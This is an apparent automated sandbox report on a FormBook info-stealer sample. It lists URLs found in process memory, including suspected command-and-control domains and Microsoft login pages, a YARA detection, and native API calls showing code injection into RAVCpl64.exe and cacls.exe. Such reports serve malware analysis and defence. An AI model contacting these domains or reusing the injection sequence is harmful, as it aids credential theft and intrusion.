                Source: RAVCpl64.exe, 00000003.00000002.183800347636.000000000755C000.00000004.80000000.00040000.00000000.sdmp, cacls.exe, 00000004.00000002.182792439928.0000000006720000.00000004.00000800.00020000.00000000.sdmp, cacls.exe, 00000004.00000002.182791208626.000000000476C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.epicurecooks.world/Gourmet.cfm?fp=oRjqTKvNE1HJY5QlICDKPU%2FlUKBvBjy%2FRk5sF9Bh%2Fbshv%2Fl
                Source: RAVCpl64.exe, 00000003.00000002.183800347636.000000000755C000.00000004.80000000.00040000.00000000.sdmp, cacls.exe, 00000004.00000002.182792439928.0000000006720000.00000004.00000800.00020000.00000000.sdmp, cacls.exe, 00000004.00000002.182791208626.000000000476C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.epicurecooks.world/Prospect_Epicure_J-REIT_Value_Fund.cfm?fp=oRjqTKvNE1HJY5QlICDKPU%2FlUK
                Source: RAVCpl64.exe, 00000003.00000002.183800347636.000000000755C000.00000004.80000000.00040000.00000000.sdmp, cacls.exe, 00000004.00000002.182792439928.0000000006720000.00000004.00000800.00020000.00000000.sdmp, cacls.exe, 00000004.00000002.182791208626.000000000476C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.epicurecooks.world/Victorian_Epicure.cfm?fp=oRjqTKvNE1HJY5QlICDKPU%2FlUKBvBjy%2FRk5sF9Bh%
                Source: RAVCpl64.exe, 00000003.00000002.183800347636.000000000755C000.00000004.80000000.00040000.00000000.sdmp, cacls.exe, 00000004.00000002.182792439928.0000000006720000.00000004.00000800.00020000.00000000.sdmp, cacls.exe, 00000004.00000002.182791208626.000000000476C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.epicurecooks.world/__media__/design/underconstructionnotice.php?d=epicurecooks.world
                Source: RAVCpl64.exe, 00000003.00000002.183800347636.000000000755C000.00000004.80000000.00040000.00000000.sdmp, cacls.exe, 00000004.00000002.182792439928.0000000006720000.00000004.00000800.00020000.00000000.sdmp, cacls.exe, 00000004.00000002.182791208626.000000000476C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.epicurecooks.world/__media__/js/trademark.php?d=epicurecooks.world&type=ns
                Source: cacls.exe, 00000004.00000002.182792439928.0000000006720000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.epicurecooks.world/px.js?ch=1
                Source: cacls.exe, 00000004.00000002.182792439928.0000000006720000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.epicurecooks.world/px.js?ch=2
                Source: cacls.exe, 00000004.00000002.182792439928.0000000006720000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.epicurecooks.world/sk-logabpstatus.php?a=NFd0ZVVKdXZlZDdYNHJGc0I1RTNRRkVRVzhkaGNtTDd4UEdy
                Source: RAVCpl64.exe, 00000003.00000002.183800347636.0000000008510000.00000004.80000000.00040000.00000000.sdmp, cacls.exe, 00000004.00000002.182791208626.0000000005720000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.wesped.com/
                Source: cacls.exe, 00000004.00000002.182792565138.00000000081CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: RAVCpl64.exe, 00000003.00000002.183800347636.00000000086A2000.00000004.80000000.00040000.00000000.sdmp, cacls.exe, 00000004.00000002.182791208626.00000000058B2000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://beian.miit.gov.cn/
                Source: RAVCpl64.exe, 00000003.00000002.183800347636.000000000755C000.00000004.80000000.00040000.00000000.sdmp, cacls.exe, 00000004.00000002.182791208626.000000000476C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://cdn.consentmanager.net
                Source: cacls.exe, 00000004.00000002.182792565138.00000000081CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: RAVCpl64.exe, 00000003.00000002.183800347636.000000000755C000.00000004.80000000.00040000.00000000.sdmp, cacls.exe, 00000004.00000002.182791208626.000000000476C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://delivery.consentmanager.net
                Source: cacls.exe, 00000004.00000002.182791208626.000000000476C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://dts.gnpge.com
                Source: G8uE-69OL.4.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: cacls.exe, 00000004.00000003.179416057961.000000000823B000.00000004.00000020.00020000.00000000.sdmp, cacls.exe, 00000004.00000002.182792565138.00000000081CF000.00000004.00000020.00020000.00000000.sdmp, G8uE-69OL.4.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: G8uE-69OL.4.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: cacls.exe, 00000004.00000002.182792565138.00000000081CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gemini.google.com/app?q=
                Source: cacls.exe, 00000004.00000002.182789173794.00000000031AA000.00000004.00000020.00020000.00000000.sdmp, cacls.exe, 00000004.00000003.179407798051.0000000003184000.00000004.00000020.00020000.00000000.sdmp, cacls.exe, 00000004.00000003.179407798051.000000000318D000.00000004.00000020.00020000.00000000.sdmp, cacls.exe, 00000004.00000003.179407998733.00000000031AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/
                Source: cacls.exe, 00000004.00000002.182789173794.00000000031AA000.00000004.00000020.00020000.00000000.sdmp, cacls.exe, 00000004.00000003.179407798051.000000000318D000.00000004.00000020.00020000.00000000.sdmp, cacls.exe, 00000004.00000003.179407998733.00000000031AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com//
                Source: cacls.exe, 00000004.00000003.179407798051.000000000318D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/https://login.live.com/
                Source: cacls.exe, 00000004.00000002.182789173794.00000000031AA000.00000004.00000020.00020000.00000000.sdmp, cacls.exe, 00000004.00000003.179407798051.000000000318D000.00000004.00000020.00020000.00000000.sdmp, cacls.exe, 00000004.00000003.179407998733.00000000031AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/v104
                Source: cacls.exe, 00000004.00000002.182789173794.0000000003141000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrd?lcid=1033&syslcid=2057&uilcid=1033&app=1&ver=16&build=1
                Source: cacls.exe, 00000004.00000002.182789173794.000000000316C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrdlcid=1033&syslcid=2057&uilcid=1033&app=1&ver=16&build=16
                Source: cacls.exe, 00000004.00000003.179406977109.00000000081BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrdres://C:
                Source: RAVCpl64.exe, 00000003.00000002.183800347636.0000000008510000.00000004.80000000.00040000.00000000.sdmp, cacls.exe, 00000004.00000002.182791208626.0000000005720000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://sedo.com/checkdomainoffer.php?language=es&domain=dialogpriest.online&partnerid=318876
                Source: cacls.exe, 00000004.00000003.179416057961.000000000823B000.00000004.00000020.00020000.00000000.sdmp, cacls.exe, 00000004.00000002.182792565138.00000000081CF000.00000004.00000020.00020000.00000000.sdmp, G8uE-69OL.4.drString found in binary or memory: https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/search
                Source: cacls.exe, 00000004.00000003.179416057961.000000000823B000.00000004.00000020.00020000.00000000.sdmp, G8uE-69OL.4.drString found in binary or memory: https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: cacls.exe, 00000004.00000002.182792565138.00000000081CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: cacls.exe, 00000004.00000003.179416057961.000000000823B000.00000004.00000020.00020000.00000000.sdmp, G8uE-69OL.4.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: RAVCpl64.exe, 00000003.00000002.183800347636.0000000007880000.00000004.80000000.00040000.00000000.sdmp, cacls.exe, 00000004.00000002.182791208626.0000000004A90000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.juewucangku.xyz/mia8/?pluxVm=lJqwuwutw0TxfZ38sJgHJ7uqXbvMJU6pA/kgjN31XYZ5TRzvlECqmYueWqh
                Source: RAVCpl64.exe, 00000003.00000002.183800347636.0000000008510000.00000004.80000000.00040000.00000000.sdmp, cacls.exe, 00000004.00000002.182791208626.0000000005720000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.wesped.com/cart.php?a=add&domain=register

                E-Banking Fraud

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 2.2.Pp7OXMFwqhXKx5Y.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.Pp7OXMFwqhXKx5Y.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000002.00000002.179274577947.0000000005D30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.182790212280.0000000003470000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.179229670326.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.182790291540.00000000034C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0042C713 NtClose,2_2_0042C713
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014E34E0 NtCreateMutant,LdrInitializeThunk,2_2_014E34E0
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014E2BC0 NtQueryInformationToken,LdrInitializeThunk,2_2_014E2BC0
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014E2B90 NtFreeVirtualMemory,LdrInitializeThunk,2_2_014E2B90
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014E2A80 NtClose,LdrInitializeThunk,2_2_014E2A80
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014E2D10 NtQuerySystemInformation,LdrInitializeThunk,2_2_014E2D10
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014E2EB0 NtProtectVirtualMemory,LdrInitializeThunk,2_2_014E2EB0
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014E4260 NtSetContextThread,2_2_014E4260
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014E4570 NtSuspendThread,2_2_014E4570
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014E29D0 NtWaitForSingleObject,2_2_014E29D0
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014E29F0 NtReadFile,2_2_014E29F0
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014E38D0 NtGetContextThread,2_2_014E38D0
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014E2B00 NtQueryValueKey,2_2_014E2B00
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014E2B10 NtAllocateVirtualMemory,2_2_014E2B10
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014E2B20 NtQueryInformationProcess,2_2_014E2B20
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014E2BE0 NtQueryVirtualMemory,2_2_014E2BE0
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014E2B80 NtCreateKey,2_2_014E2B80
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014E2A10 NtWriteFile,2_2_014E2A10
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014E2AC0 NtEnumerateValueKey,2_2_014E2AC0
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014E2AA0 NtQueryInformationFile,2_2_014E2AA0
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014E2D50 NtWriteVirtualMemory,2_2_014E2D50
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014E2DC0 NtAdjustPrivilegesToken,2_2_014E2DC0
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014E2DA0 NtReadVirtualMemory,2_2_014E2DA0
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014E2C50 NtUnmapViewOfSection,2_2_014E2C50
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014E2C10 NtOpenProcess,2_2_014E2C10
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014E2C20 NtSetInformationFile,2_2_014E2C20
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014E2C30 NtMapViewOfSection,2_2_014E2C30
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014E3C30 NtOpenProcessToken,2_2_014E3C30
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014E2CD0 NtEnumerateKey,2_2_014E2CD0
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014E2CF0 NtDelayExecution,2_2_014E2CF0
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014E3C90 NtOpenThread,2_2_014E3C90
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014E2F00 NtCreateFile,2_2_014E2F00
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014E2F30 NtOpenDirectoryObject,2_2_014E2F30
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014E2FB0 NtSetValueKey,2_2_014E2FB0
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014E2E50 NtCreateSection,2_2_014E2E50
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014E2E00 NtQueueApcThread,2_2_014E2E00
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014E2EC0 NtQuerySection,2_2_014E2EC0
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014E2ED0 NtResumeThread,2_2_014E2ED0
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014E2E80 NtCreateProcessEx,2_2_014E2E80
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 3_2_03DBC6E4 SleepEx,NtCreateSection,3_2_03DBC6E4
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 3_2_03DBC8E8 SleepEx,NtResumeThread,3_2_03DBC8E8
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 4_2_03782B10 NtAllocateVirtualMemory,LdrInitializeThunk,4_2_03782B10
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 4_2_03782B00 NtQueryValueKey,LdrInitializeThunk,4_2_03782B00
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 4_2_03782BC0 NtQueryInformationToken,LdrInitializeThunk,4_2_03782BC0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 4_2_03782B90 NtFreeVirtualMemory,LdrInitializeThunk,4_2_03782B90
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 4_2_03782B80 NtCreateKey,LdrInitializeThunk,4_2_03782B80
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 4_2_03782A10 NtWriteFile,LdrInitializeThunk,4_2_03782A10
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 4_2_03782AC0 NtEnumerateValueKey,LdrInitializeThunk,4_2_03782AC0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 4_2_03782A80 NtClose,LdrInitializeThunk,4_2_03782A80
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 4_2_037829F0 NtReadFile,LdrInitializeThunk,4_2_037829F0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 4_2_03782F00 NtCreateFile,LdrInitializeThunk,4_2_03782F00
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 4_2_03782E50 NtCreateSection,LdrInitializeThunk,4_2_03782E50
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 4_2_03782D10 NtQuerySystemInformation,LdrInitializeThunk,4_2_03782D10
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 4_2_03782C30 NtMapViewOfSection,LdrInitializeThunk,4_2_03782C30
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 4_2_03782CF0 NtDelayExecution,LdrInitializeThunk,4_2_03782CF0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 4_2_037834E0 NtCreateMutant,LdrInitializeThunk,4_2_037834E0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 4_2_03784260 NtSetContextThread,4_2_03784260
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 4_2_03784570 NtSuspendThread,4_2_03784570
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 4_2_03782B20 NtQueryInformationProcess,4_2_03782B20
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 4_2_03782BE0 NtQueryVirtualMemory,4_2_03782BE0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 4_2_03782AA0 NtQueryInformationFile,4_2_03782AA0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 4_2_037829D0 NtWaitForSingleObject,4_2_037829D0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 4_2_03782F30 NtOpenDirectoryObject,4_2_03782F30
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 4_2_03782FB0 NtSetValueKey,4_2_03782FB0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 4_2_03782E00 NtQueueApcThread,4_2_03782E00
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 4_2_03782ED0 NtResumeThread,4_2_03782ED0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 4_2_03782EC0 NtQuerySection,4_2_03782EC0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 4_2_03782EB0 NtProtectVirtualMemory,4_2_03782EB0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 4_2_03782E80 NtCreateProcessEx,4_2_03782E80
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 4_2_03782D50 NtWriteVirtualMemory,4_2_03782D50
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 4_2_03782DC0 NtAdjustPrivilegesToken,4_2_03782DC0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 4_2_03782DA0 NtReadVirtualMemory,4_2_03782DA0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 4_2_03782C50 NtUnmapViewOfSection,4_2_03782C50
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 4_2_03782C20 NtSetInformationFile,4_2_03782C20
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 4_2_03782C10 NtOpenProcess,4_2_03782C10
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 4_2_03782CD0 NtEnumerateKey,4_2_03782CD0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 4_2_037838D0 NtGetContextThread,4_2_037838D0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 4_2_03783C30 NtOpenProcessToken,4_2_03783C30
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 4_2_03783C90 NtOpenThread,4_2_03783C90
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 4_2_035CEDDD NtQueryInformationProcess,NtReadVirtualMemory,4_2_035CEDDD
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 4_2_035D3318 NtSetContextThread,4_2_035D3318
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 4_2_035D432D NtMapViewOfSection,4_2_035D432D
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 4_2_035D3628 NtSuspendThread,4_2_035D3628
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 4_2_035D46F8 NtUnmapViewOfSection,4_2_035D46F8
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 4_2_035D3938 NtResumeThread,4_2_035D3938
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 4_2_035CEDE8 NtQueryInformationProcess,4_2_035CEDE8
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 4_2_035D3C48 NtQueueApcThread,4_2_035D3C48
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 0_2_0193DFE40_2_0193DFE4
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 0_2_07959F400_2_07959F40
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 0_2_079566300_2_07956630
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 0_2_079545480_2_07954548
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 0_2_07953CD80_2_07953CD8
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 0_2_07953CC80_2_07953CC8
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 0_2_079541100_2_07954110
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 0_2_079559500_2_07955950
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_004186832_2_00418683
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_004028C02_2_004028C0
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_004168932_2_00416893
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_004101C32_2_004101C3
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0040E1D32_2_0040E1D3
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_004031E02_2_004031E0
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0040E3212_2_0040E321
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0040E3232_2_0040E323
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_004013D02_2_004013D0
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_00402CA02_2_00402CA0
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0042ED132_2_0042ED13
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_004025B02_2_004025B0
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0040FF9A2_2_0040FF9A
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0040FFA32_2_0040FFA3
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014F717A2_2_014F717A
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0157010E2_2_0157010E
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0149F1132_2_0149F113
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0154D1302_2_0154D130
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014B51C02_2_014B51C0
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014CB1E02_2_014CB1E0
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0155E0762_2_0155E076
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014BB0D02_2_014BB0D0
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_015670F12_2_015670F1
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014E508C2_2_014E508C
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014A00A02_2_014A00A0
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014BE3102_2_014BE310
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0156F3302_2_0156F330
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014A13802_2_014A1380
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0156124C2_2_0156124C
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0149D2EC2_2_0149D2EC
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0157A5262_2_0157A526
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_015675C62_2_015675C6
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0156F5C92_2_0156F5C9
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014B04452_2_014B0445
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0151D4802_2_0151D480
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_015667572_2_01566757
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014B27602_2_014B2760
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014BA7602_2_014BA760
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0155D6462_2_0155D646
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014D46702_2_014D4670
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014CC6002_2_014CC600
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0154D62C2_2_0154D62C
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0156A6C02_2_0156A6C0
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0156F6F62_2_0156F6F6
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014AC6E02_2_014AC6E0
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_015236EC2_2_015236EC
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014B06802_2_014B0680
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014F59C02_2_014F59C0
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014AE9A02_2_014AE9A0
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0156E9A62_2_0156E9A6
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014968682_2_01496868
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_015258702_2_01525870
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0156F8722_2_0156F872
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014B98702_2_014B9870
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014CB8702_2_014CB870
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014B38002_2_014B3800
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014DE8102_2_014DE810
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_015508352_2_01550835
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014B28C02_2_014B28C0
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_015618DA2_2_015618DA
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_015678F32_2_015678F3
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014C68822_2_014C6882
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_015298B22_2_015298B2
